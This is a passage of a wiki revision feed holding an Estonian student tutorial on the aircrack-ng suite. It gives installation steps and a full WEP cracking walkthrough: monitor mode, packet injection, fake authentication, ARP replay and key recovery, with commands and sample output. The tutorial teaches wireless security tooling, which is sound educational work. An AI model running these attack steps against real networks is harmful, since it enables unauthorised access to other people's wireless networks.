&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_5_-_start_aireplay-ng_in_arp_request_replay_mode Step 5 - Start aireplay-ng in ARP request replay mode]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;Saving ARP requests in replay_arp-0321-191525.cap&lt;br /&gt;
You should also start airodump-ng to capture replies.&lt;br /&gt;
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 6: Ava aircrack-ng salasõna lahti murdmiseks&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_6_-_run_aircrack-ng_to_obtain_the_wep_key Step 6 - Run aircrack-ng to obtain the WEP key]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken: &lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng -b 00:14:6C:7E:40:80 output*.cap&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&lt;br /&gt;
Selgitus:&lt;br /&gt;
&#039;&#039;-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;                             [00:03:06] Tested 674449 keys (got 96610 IVs)&lt;br /&gt;
&lt;br /&gt;
KB    depth   byte(vote)&lt;br /&gt;
 0    0/  9   12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(   5) 77(   5) A5(   3) F6(   3) 03(   0) &lt;br /&gt;
 1    0/  8   34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12) &lt;br /&gt;
 2    0/  2   56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10) &lt;br /&gt;
 3    1/  5   78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15) &lt;br /&gt;
&lt;br /&gt;
                      KEY FOUND! [ 12:34:56:78:90 ] &lt;br /&gt;
     Probability: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Kokkuvõte=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Kasutatud kirjandus=&lt;br /&gt;
&amp;lt;references /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Autor=&lt;br /&gt;
&lt;br /&gt;
Kelly Tragel [ISa 21]&amp;lt;br&amp;gt;&lt;br /&gt;
Viimati muudetud: 25.05.2015&lt;br /&gt;
&lt;br /&gt;
=Versioonide ajalugu=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Kuupäev &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Versioon &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 25.05.2015 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 1.0 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ktragel</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89333</id>
		<title>Aircrack</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89333"/>
		<updated>2015-05-25T19:57:44Z</updated>

		<summary type="html">&lt;p&gt;Ktragel: /* Eeldused */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Sissejuhatus=&lt;br /&gt;
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit. &lt;br /&gt;
&lt;br /&gt;
=Eeldused=&lt;br /&gt;
&lt;br /&gt;
* Elementaarne käsurea kasutamisoskus&lt;br /&gt;
* Teadmised WiFi, WEP, WPA/WPA2 kohta&lt;br /&gt;
* Võrgus vähemalt 1 aktiivne klient&lt;br /&gt;
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)&lt;br /&gt;
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)&lt;br /&gt;
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])&lt;br /&gt;
&lt;br /&gt;
WiFi adapteri vaatamine&amp;lt;ref&amp;gt;[https://wiki.debian.org/HowToIdentifyADevice/PCI PCI ]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
&amp;lt;pre&amp;gt;lspci -nn | grep Network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või rohkema informatsiooni saamiseks&amp;lt;ref&amp;gt;[http://www.cyberciti.biz/faq/linux-list-network-cards-command/ HowTo: Linux Show List Of Network Cards]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;lshw -class network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemuseks saame midagi sarnast:&lt;br /&gt;
&amp;lt;pre&amp;gt;02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;*-network&lt;br /&gt;
       description: Wireless interface&lt;br /&gt;
       product: Centrino Advanced-N 6205 [Taylor Peak]&lt;br /&gt;
       vendor: Intel Corporation&lt;br /&gt;
       physical id: 0&lt;br /&gt;
       bus info: pci@0000:02:00.0&lt;br /&gt;
       logical name: wlan0&lt;br /&gt;
       version: 34&lt;br /&gt;
       serial: 6c:88:14:1d:29:c4&lt;br /&gt;
       width: 64 bits&lt;br /&gt;
       clock: 33MHz&lt;br /&gt;
       capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless&lt;br /&gt;
       configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn&lt;br /&gt;
       resources: irq:32 memory:f7d00000-f7d01fff&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;&amp;lt;!-- Warning style viksitud ArchWikist --&amp;gt;div style=&amp;quot;padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;&amp;quot;&amp;gt;&#039;&#039;&#039;Pane tähele! &#039;&#039;&#039;Antud juhend on koostatud kasutades Aircrack-ng 1.2 RC2 versiooni. &amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Üldkirjeldus=&lt;br /&gt;
&lt;br /&gt;
aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm&amp;lt;ref&amp;gt;[http://www.aircrack-ng.org/doku.php?id=aircrack-ng#description Description]&amp;lt;/ref&amp;gt;. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu:&lt;br /&gt;
* airodump-ng - programm pakettide püüdmiseks &lt;br /&gt;
* aireplay-ng - programm pakettide „süstimiseks“ &lt;br /&gt;
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija&lt;br /&gt;
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks &lt;br /&gt;
&lt;br /&gt;
==Süntaks==&lt;br /&gt;
&lt;br /&gt;
aircrack-ng süntaks näeb välja järgmine&amp;lt;ref&amp;gt;[http://www.aircrack-ng.org/doku.php?id=aircrack-ng#usage Usage]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng [võti] &amp;lt;püütud fail(id)&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&amp;amp;DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]&lt;br /&gt;
&lt;br /&gt;
=Installeerimine=&lt;br /&gt;
&lt;br /&gt;
Uuendame repositooriumi:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get update&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt&amp;lt;ref&amp;gt;[http://askubuntu.com/questions/294651/step-by-step-guide-to-install-aircrack-ng-suite-on-ubuntu-12-04-lts Step by Step guide to install aircrack-ng suite on ubuntu 12.04 LTS [duplicate]]&amp;lt;/ref&amp;gt;:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get install aircrack-ng&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=WEP võtme murdmine=&lt;br /&gt;
&lt;br /&gt;
Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#equipment_used Equipment used]&amp;lt;/ref&amp;gt;: &lt;br /&gt;
* Arvuti MAC aadress, mis jooksutab aircrack-ng&#039;d: 00:0F:B5:88:AC:82&lt;br /&gt;
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80&lt;br /&gt;
* ESSID (võrgu nimi): teddy&lt;br /&gt;
* Pääsupunkti kanal: 9&lt;br /&gt;
* Raadiovõrgu liides (ingl. k Wireless interface): ath0&lt;br /&gt;
&lt;br /&gt;
==Eesmärk==&lt;br /&gt;
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview]&amp;lt;/ref&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
==Lühikesed tegevussammud==&lt;br /&gt;
Lühidalt sammudest, mida tegema asume&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#solution_overview Solution Overview - the basic steps]&amp;lt;/ref&amp;gt;:&amp;lt;br&amp;gt;&lt;br /&gt;
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode)&amp;lt;br&amp;gt;&lt;br /&gt;
2. Testime „süstimise“ suutlikkust pääsupunktile &amp;lt;br&amp;gt;&lt;br /&gt;
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
4. Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga &amp;lt;br&amp;gt;&lt;br /&gt;
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette&amp;lt;br&amp;gt;&lt;br /&gt;
6. Kasutada aircrack-ng&#039;d salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Näide WEP võtme lahti murdmise protsessist==&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_1_-_start_the_wireless_interface_in_monitor_mode_on_ap_channel Step 1 - Start the wireless interface in monitor mode on AP channel]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.&lt;br /&gt;
 &lt;br /&gt;
Peata ath0 liides:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng stop ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;Interface       Chipset         Driver&lt;br /&gt;
&lt;br /&gt;
wifi0           Atheros         madwifi-ng&lt;br /&gt;
ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kontrolli, kas kõik athX liidesed on ikka suletud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Märge:&#039;&#039;&#039; Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval &#039;&#039;airmon-ng stop athX&#039;&#039; käsuga sulgeda.&lt;br /&gt;
&lt;br /&gt;
Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng start wifi0 9&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav &#039;&#039;airmon-ng stop ath0&#039;&#039; käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raadiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt; Interface       Chipset         Driver&lt;br /&gt;
 &lt;br /&gt;
 wifi0           Atheros         madwifi-ng&lt;br /&gt;
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; “ath0” liides on märgitud nüüd kuulamisrežiimi.&lt;br /&gt;
&lt;br /&gt;
Veendumaks, et liides on korrektselt üles seatud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
ath0      IEEE 802.11g  ESSID:&amp;quot;&amp;quot;  Nickname:&amp;quot;&amp;quot;&lt;br /&gt;
       Mode:Monitor  Frequency:2.452 GHz  Access Point: 00:0F:B5:88:AC:82   &lt;br /&gt;
       Bit Rate:0 kb/s   Tx-Power:18 dBm   Sensitivity=0/3  &lt;br /&gt;
       Retry:off   RTS thr:off   Fragment thr:off&lt;br /&gt;
       Encryption key:off&lt;br /&gt;
       Power Management:off&lt;br /&gt;
       Link Quality=0/94  Signal level=-95 dBm  Noise level=-95 dBm&lt;br /&gt;
       Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
       Tx excessive retries:0  Invalid misc:0   Missed beacon:0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Kontrolli:&#039;&#039;&#039; Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng&#039;d jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 2: Testime „süstimise“ suutlikkust pääsupunktile&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_2_-_test_wireless_device_packet_injection Step 2 - Test Wireless Device Packet Injection]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.&lt;br /&gt;
 &lt;br /&gt;
Sisesta käsureale:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80  ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-9 - “süstimise” test&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-e teddy – raadiovõrgu nimi&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;ath0 – raadiovõrgu liides&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;09:23:35  Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
09:23:35  Trying broadcast probe requests...&lt;br /&gt;
09:23:35  Injection is working!&lt;br /&gt;
09:23:37  Found 1 AP &lt;br /&gt;
&lt;br /&gt;
09:23:37  Trying directed probe requests...&lt;br /&gt;
09:23:37  00:14:6C:7E:40:80 - channel: 9 - &#039;teddy&#039;&lt;br /&gt;
09:23:39  Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73&lt;br /&gt;
09:23:39  30/30: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.  &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 3: Avada airodump-ng pakettide püüdmiseks&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_3_-_start_airodump-ng_to_capture_the_ivs Step 3 - Start airodump-ng to capture the IVs]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta: &lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-c 9 – raadiovõrgu kanal&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühenduda&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:&lt;br /&gt;
&amp;lt;pre&amp;gt;CH  9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25 &lt;br /&gt;
                                                                                                              &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80   42 100     5240   178307  338   9  54  WEP  WEP         teddy                           &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 BSSID              STATION            PWR  Lost  Packets  Probes                                             &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80  00:0F:B5:88:AC:82   42     0   183782  &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 4: Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_4_-_use_aireplay-ng_to_do_a_fake_authentication_with_the_access_point Step 4 - Use aireplay-ng to do a fake authentication with the access point]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgitus:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-1 – võlts autentimine&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;0 – kordusühendus(t)e aeg sekundites&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Õnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;18:18:20  Sending Authentication Request&lt;br /&gt;
18:18:20  Authentication successful&lt;br /&gt;
18:18:20  Sending Association Request&lt;br /&gt;
18:18:20  Association successful :-)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ebaõnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;8:28:02  Sending Authentication Request&lt;br /&gt;
18:28:02  Authentication successful&lt;br /&gt;
18:28:02  Sending Association Request&lt;br /&gt;
18:28:02  Association successful :-)&lt;br /&gt;
18:28:02  Got a deauthentication packet!&lt;br /&gt;
18:28:05  Sending Authentication Request&lt;br /&gt;
18:28:05  Authentication successful&lt;br /&gt;
18:28:05  Sending Association Request&lt;br /&gt;
18:28:10  Sending Authentication Request&lt;br /&gt;
18:28:10  Authentication successful&lt;br /&gt;
18:28:10  Sending Association Request&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_5_-_start_aireplay-ng_in_arp_request_replay_mode Step 5 - Start aireplay-ng in ARP request replay mode]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;Saving ARP requests in replay_arp-0321-191525.cap&lt;br /&gt;
You should also start airodump-ng to capture replies.&lt;br /&gt;
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 6: Ava aircrack-ng salasõna lahti murdmiseks&#039;&#039;&#039;&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#step_6_-_run_aircrack-ng_to_obtain_the_wep_key Step 6 - Run aircrack-ng to obtain the WEP key]&amp;lt;/ref&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken: &lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng -b 00:14:6C:7E:40:80 output*.cap&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&lt;br /&gt;
Selgitus:&lt;br /&gt;
&#039;&#039;-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;                             [00:03:06] Tested 674449 keys (got 96610 IVs)&lt;br /&gt;
&lt;br /&gt;
KB    depth   byte(vote)&lt;br /&gt;
 0    0/  9   12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(   5) 77(   5) A5(   3) F6(   3) 03(   0) &lt;br /&gt;
 1    0/  8   34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12) &lt;br /&gt;
 2    0/  2   56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10) &lt;br /&gt;
 3    1/  5   78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15) &lt;br /&gt;
&lt;br /&gt;
                      KEY FOUND! [ 12:34:56:78:90 ] &lt;br /&gt;
     Probability: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Kokkuvõte=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Kasutatud kirjandus=&lt;br /&gt;
&amp;lt;references /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Autor=&lt;br /&gt;
&lt;br /&gt;
Kelly Tragel [ISa 21]&amp;lt;br&amp;gt;&lt;br /&gt;
Viimati muudetud: 25.05.2015&lt;br /&gt;
&lt;br /&gt;
=Versioonide ajalugu=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Kuupäev &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Versioon &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 25.05.2015 &amp;lt;/td&amp;gt;&lt;br /&gt;
